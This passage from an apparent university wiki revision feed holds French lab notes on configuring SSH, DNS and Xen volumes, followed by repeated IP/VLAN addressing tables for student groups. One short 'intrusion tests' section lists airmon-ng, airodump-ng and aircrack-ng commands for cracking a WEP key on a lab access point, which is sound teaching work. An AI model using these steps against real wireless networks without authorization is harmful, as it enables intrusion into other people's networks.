 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 86400&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site.      postmaster.anosteke59.site. (&lt;br /&gt;
                         2021112901      ; serial number YYMMDDNN&lt;br /&gt;
                         28800           ; Refresh&lt;br /&gt;
                         7200            ; Retry&lt;br /&gt;
                         864000          ; Expire&lt;br /&gt;
                         86400           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
                 NS      ns.anosteke59.site.&lt;br /&gt;
                 NS      ns6.gandi.net. &lt;br /&gt;
 $ORIGIN anosteke59.site.&lt;br /&gt;
 ns  IN A   193.48.57.182&lt;br /&gt;
 www IN CNAME ns&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
nslookup anosteke59.site &lt;br /&gt;
dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start NOM_DE_L_INTERFACE 3&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est ??? On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 3 --bssid ??? wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&amp;diff=56595</id>
		<title>TP sysres IMA5sc 2021/2022</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&amp;diff=56595"/>
				<updated>2021-11-29T15:14:34Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G1 | Cahier n°1]]&lt;br /&gt;
| Andrei Florea / Julien Delabre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G2 | Cahier n°2]]&lt;br /&gt;
| Robin Lasserye / Aviran Tetia &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G3 | Cahier n°3]]&lt;br /&gt;
| Axel Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G4 | Cahier n°4]]&lt;br /&gt;
| Selim Raphael&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G5 | Cahier n°5]]&lt;br /&gt;
| Helene Camille&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G6 | Cahier n°6]]&lt;br /&gt;
| Boris JACQUOT / Louis WADBLED&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G7 | Cahier n°7]]&lt;br /&gt;
| Johnny Gouvaert / Arthur Vercaemst&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G8 | Cahier n°8]]&lt;br /&gt;
| Mel Theo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G9 | Cahier n°9]]&lt;br /&gt;
| Khalil Alvare&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G10 | Cahier n°10]]&lt;br /&gt;
| Souleyman Enoch&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G11 | Cahier n°11]]&lt;br /&gt;
| Clément&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G12 | Cahier n°12]]&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G13 | Cahier n°13]]&lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B1::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B2::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B3::0/64 || 10.03.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B4::0/64 || 10.04.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || Duff&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B5::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B6::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B7::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || RinceCochon&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B8::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Souleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B9::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || Panache&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60BA::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || Corona&lt;br /&gt;
|-&lt;br /&gt;
| INTERCO || 531 || 192.168.222.72/29 ||  || || 192.168.222.7? || 192.168.222.75 || 192.168.222.7? ||  || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| XEN || 42 || 193.48.57.160/28 || 2001:7A8:116E:60BF::0/64 || 193.48.57.190/28 2001:7A8:116E:60B0::F3/64 || 193.48.57.187/28 2001:7A8:116E:60B0::F0/64|| 193.48.57.188/28 2001:7A8:116E:60B0::F1/64 || 192.48.57.189/28 2001:7A8:116E:60B0::F2/64|| || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Souleyman / Enoch || 193.48.57.185/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.41/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
!--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Architecture réseau=&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&amp;diff=56594</id>
		<title>TP sysres IMA5sc 2021/2022</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&amp;diff=56594"/>
				<updated>2021-11-29T15:14:16Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G1 | Cahier n°1]]&lt;br /&gt;
| Andrei Florea / Julien Delabre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G2 | Cahier n°2]]&lt;br /&gt;
| Robin Lasserye / Aviran Tetia &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G3 | Cahier n°3]]&lt;br /&gt;
| Axel Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G4 | Cahier n°4]]&lt;br /&gt;
| Selim Raphael&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G5 | Cahier n°5]]&lt;br /&gt;
| Helene Camille&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G6 | Cahier n°6]]&lt;br /&gt;
| Boris JACQUOT / Louis WADBLED&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G7 | Cahier n°7]]&lt;br /&gt;
| Johnny Gouvaert / Arthur Vercaemst&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G8 | Cahier n°8]]&lt;br /&gt;
| Mel Theo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G9 | Cahier n°9]]&lt;br /&gt;
| Khalil Alvare&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G10 | Cahier n°10]]&lt;br /&gt;
| Souleyman Enoch&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G11 | Cahier n°11]]&lt;br /&gt;
| Clément&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G12 | Cahier n°12]]&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G13 | Cahier n°13]]&lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B1::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B2::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B3::0/64 || 10.03.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B4::0/64 || 10.04.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || Duff&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B5::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B6::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B7::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || RinceCochon&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B8::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Souleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B9::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || Panache&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60BA::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || Corona&lt;br /&gt;
|-&lt;br /&gt;
| INTERCO || 531 || 192.168.222.72/29 ||  || || 192.168.222.74 || 192.168.222.75 || 192.168.222.76 ||  || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| XEN || 42 || 193.48.57.160/28 || 2001:7A8:116E:60BF::0/64 || 193.48.57.190/28 2001:7A8:116E:60B0::F3/64 || 193.48.57.187/28 2001:7A8:116E:60B0::F0/64|| 193.48.57.188/28 2001:7A8:116E:60B0::F1/64 || 192.48.57.189/28 2001:7A8:116E:60B0::F2/64|| || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Souleyman / Enoch || 193.48.57.185/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.41/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
!--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
